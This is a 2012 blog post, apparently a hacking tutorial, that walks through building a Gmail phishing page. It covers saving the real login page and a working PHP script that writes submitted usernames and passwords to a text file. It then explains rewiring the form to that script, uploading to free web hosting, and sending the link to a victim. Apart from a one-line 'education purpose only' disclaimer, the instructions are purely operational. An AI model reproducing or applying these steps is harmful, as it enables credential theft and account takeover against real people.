Monday, 3 September 2012

How To Hack using Phishing Method



What is Phishing?


Phishing is the process of stealing sensitive information, such as usernames, passwords, and bank information, by pretending to be someone you’re not. An example of this would be if you receive and e-mail from a hacker pretending to be your bank. In this e-mail, it might tell you that you need to update your account before it expires, and then the hacker provides a link. Once you click on the link, you arrive at a website that looks exactly like your actual bank page. In reality it’s just a perfect replica, and when you input your login details, it sends it to the hackers email or stores it on his web server. Hackers that create the best, most deceiving phishing web pages are knowledgeable in the area of HTML and the PHP programming. Below I will show a simple example of some of the steps a hacker might take to create a phishing website. By seeing the steps a hacker would take, will help you defend against such an attack.

Note: This is for education purpose only.

Follow the following steps:

1. First the hacker chooses a target. The most popular targets for phishing attacks are e-mail services such as Hotmail, facebook and Gmail because they are the most common and once a hacker gets access to your e-mail, he also gets access to a load of other user information for all the other websites you use. In this example we will pretend the hacker chose Gmail as his target.

2. After choosing his target, the hacker will go to the website and save the whole main page. I use Mozilla Firefox ,(highly recommend using this browser for its security and customization.) So I would go to www.gmail.com and click File -> Save page as… , or simply hit <CTR> + S which does this automatically. Choose where you would like to save the web page and hit Save.



3. Next the hacker would create a PHP script to do his dirty deed of steeling your information. Below is a simple PHP script that logs and stores your login details when you click “Sign in”. To see how it works, copy and paste the following code into notepad. Next save it into the same directory as you saved the Gmail page, and name it phish.php. It should make a PHP file in the folder. If you dont find any PHP file than save the file with quotations like "phish.php" , it should make a php file.
 In addition to the phish.php page, create a new empty text file and name it list.txt.

CODE:
------------------------------------------------------------------------------------------------------------
<?php
header("Location: http://www.gmail.com.com");
$handle = fopen("list.txt", "a");
foreach($_GET as $variable => $value)
{
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
------------------------------------------------------------------------------------------------------------

So far you should see the following in your folder:

4. Now the hacker would have to edit the main Gmail page to include his PHP script. To see what the hacker would do, open up the main Gmail page named ServiceLogin.htm with notepad.

5. Hit <CTR> + F , or go to Edit -> Find , type in action and hit “Find Next”.

6. This will highlight the first occurrence of the word “action” in the script and you should see the following:
There are two “action” occurrences in the script so make sure you have the right one by looking at the “form id” name above. Change the link between action = “ “ to phish.php . This will make the form submit to your PHP phish script instead of to Google. After the link you will see the code:

Change the word “POST” to “GET” so that it looks like method=”GET”. What the GET method does is submit the information you type in through the URL so that the PHP script can log it.

7. Save the  file and.rename ServiceLogin.htm to index.htm. The reason you want to name it “index” is so when you upload it to a web host and someone goes to your link, the index page is the first page that shows up.

8.Now you'll need a free web hosting service that supports PHP. 
Go to http://www.google.com and search for free web hosting websites.
Choose any one of a website. I'll reccommend to choose either 00webhost.com or 5gbfree.com(I used this one). 

9.Sign Up for a free account. After Signing up, go to the website and than login with your account.
It will take you to the C-panel X, . there go to the file manager and choose webroot as directory.

 A new tab will open up. There up load all the file index.html, list.txt and PHP file. 
When uploading change the permission of the list.txt to 777 by ticking all the boxes. 


Now your website is read for phishing. 
Now send the your website domain name to the salve. You can find the domain name of your wesite in the C-panel. 
Whenever someone will login with you fake page its user name and password will be saved in list.txt, you can go to file manager and view it from there.

If any problem persist let me know in the comments.